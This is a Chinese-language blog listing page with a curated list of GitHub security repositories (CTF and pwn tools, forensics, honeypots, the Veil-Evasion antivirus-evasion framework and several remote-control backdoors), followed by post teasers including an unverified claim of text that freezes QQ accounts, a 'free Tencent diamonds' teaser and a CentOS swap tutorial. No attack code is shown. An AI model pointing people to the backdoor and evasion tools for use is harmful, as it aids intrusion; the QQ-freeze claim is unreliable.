https://github.com/t00sh/rop-tool CTF Pwn 类题目脚本编写框架: https://github.com/Gallopsled/pwntools an easy-to-use io library for pwning development: https://github.com/zTrix/zio 跨平台注入工具: https://github.com/frida/frida 哈希长度扩展攻击EXP: https://github.com/citronneur/rdpy 隐写: 隐写检测工具 https://github.com/abeluck/stegdetect 各类安全资料: data_hacking合集: https://github.com/ClickSecurity/data_hacking mobile-security-wiki: https://github.com/exploitprotocol/mobile-security-wiki 书籍《reverse-engineering-for-beginners》: https://github.com/veficos/reverse-engineering-for-beginners 一些信息安全标准及设备配置: https://github.com/luyg24/IT_security APT相关笔记: https://github.com/kbandla/APTnotes Kcon资料: https://github.com/knownsec/KCon 《DO NOT FUCK WITH A HACKER》: https://github.com/citypw/DNFWAH 各类安全脑洞图: https://github.com/phith0n/Mind-Map 信息安全流程图: https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428 各类CTF资源 近年ctf writeup大全: https://github.com/ctfs/write-ups-2016 https://github.com/ctfs/write-ups-2015 https://github.com/ctfs/write-ups-2014 fbctf竞赛平台Demo: https://github.com/facebook/fbctf ctf Resources: https://github.com/ctfs/resources ctf及黑客资源合集: https://github.com/bt3gl/My-Gray-Hacker-Resources ctf和安全工具大合集: https://github.com/zardus/ctf-tools ctf向 python工具包 https://github.com/P1kachu/v0lt 各类编程资源: 大礼包(什么都有): https://github.com/bayandin/awesome-awesomeness bash-handbook: https://github.com/denysdovhan/bash-handbook python资源大全: https://github.com/jobbole/awesome-python-cn git学习资料: https://github.com/xirong/my-git 安卓开源代码解析 https://github.com/android-cn/android-open-project python框架,库,资源大合集: https://github.com/vinta/awesome-python JS 正则表达式库(用于简化构造复杂的JS正则表达式): https://github.com/VerbalExpressions/JSVerbalExpressions Python: python 正则表达式库(用于简化构造复杂的python正则表达式): https://github.com/VerbalExpressions/ python任务管理以及命令执行库: https://github.com/pyinvoke/invoke python exe打包库: https://github.com/pyinstaller/pyinstaller Veil-Evasion免杀项目: https://github.com/Veil-Framework/Veil-Evasion py3 爬虫框架: https://github.com/orf/cyborg 一个提供底层接口数据包编程和网络协议支持的python库: https://github.com/CoreSecurity/impacket python requests 库: https://github.com/kennethreitz/requests python 实用工具合集: https://github.com/mahmoud/boltons python爬虫系统: https://github.com/binux/pyspider 科学上网: 科学上网工具 https://github.com/XX-net/XX-Net 福利: 微信自动抢红包动态库 https://github.com/east520/AutoGetRedEnv 微信抢红包插件(安卓版) https://github.com/geeeeeeeeek/WeChatLuckyMoney hardsed神器: https://github.com/yangyangwithgnu/hardseed 甲方安全工程师生存指南 web索引及日志搜索工具: https://github.com/thomaspatzke/WASE 开源日志采集器: https://github.com/wgliang/logcool 扫描CS结构的web debuger https://github.com/Kozea/wdb 恢复sqlite数据库删除注册信息: https://github.com/aramosf/recoversqlite/ gps欺骗检测工具: https://github.com/zxsecurity/gpsnitch 应急处置响应框架: https://github.com/biggiesmallsAG/nightHawkResponse web安全开发指南: https://github.com/FallibleInc/security-guide-for-developers 各个知名厂商漏洞测试报告模板: https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包: https://github.com/rfxn/linux-malware-detect 操作系统运行指标可视化框架: https://github.com/facebook/osquery 恶意代码分析系统: https://github.com/cuckoosandbox/cuckoo 定期搜索及存储web应用: https://github.com/Netflix/Scumblr 事件响应框架: https://github.com/google/grr 综合主机监控检测平台: https://github.com/ossec/ossec-hids 分布式实时数字取证系统: https://github.com/mozilla/mig Microsoft & Unix 文件系统及硬盘取证工具: https://github.com/sleuthkit/sleuthkit 蜜罐: SSH蜜罐: https://github.com/desaster/kippo 蜜罐集合资源: https://github.com/paralax/awesome-honeypots kippo进阶版蜜罐: https://github.com/micheloosterhof/cowrie SMTP 蜜罐: https://github.com/awhitehatter/mailoney web应用程序蜜罐: https://github.com/mushorg/glastopf 数据库蜜罐: https://github.com/jordan-wright/elastichoney web蜜罐: https://github.com/atiger77/Dionaea 远控: 用gmail充当C&C服务器的后门 https://github.com/byt3bl33d3r/gcat 开源的远控: https://github.com/UbbeLoL/uRAT c#远控: https://github.com/hussein-aitlahcen/BlackHole ...

    2019-08-26 1048
  • 利用代码百分百QQ封号7天

      这个方法只能冻结发送文字的QQ 不能冻结接收信息的QQ  发送成功后 会直接冻结7天QQ账号 并且只能等自动解冻  封号的文本已经打包了,需要的加群下载,切记别用大号做实验 请勿复制这段文字在QQ里发送 会自动冻结7天QQ号码~ ——————思路自己想,套路深就好了谁套路深谁赢—————— 此代码仅娱乐非法,用途与我无关   ...

    2019-08-26 16773
  • 免费撸腾讯钻方法

    话不多说,给你思路,自行领悟。 成功的老铁可以来评论一下。...

    2019-08-25 1171
  • centos7添加虚拟内存[SWAP]

    1.查看内存使用 查看在未增加swap之前虚拟内存的使用情况 free -m Shell  复制 2.创建 swap 文件 使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 Shell  复制 文件越大,创建的时间越厂 3.转换为 swap 格式 将文件格式转换为 swap 格式的 mkswap /home/swap Shell  复制 4.挂载swap分区 再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap Shell  复制 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested.  修改权限: chmod 600 /home/swap 5.再次查看内存使用 注意观察和1中变化。 free -m Shell  复制 6.设置重启依然有效 为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 0 Shell  复制 7.停用虚拟内存 swapoff -v /home/swap Shell  复制 ...

    2019-08-25 1331

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注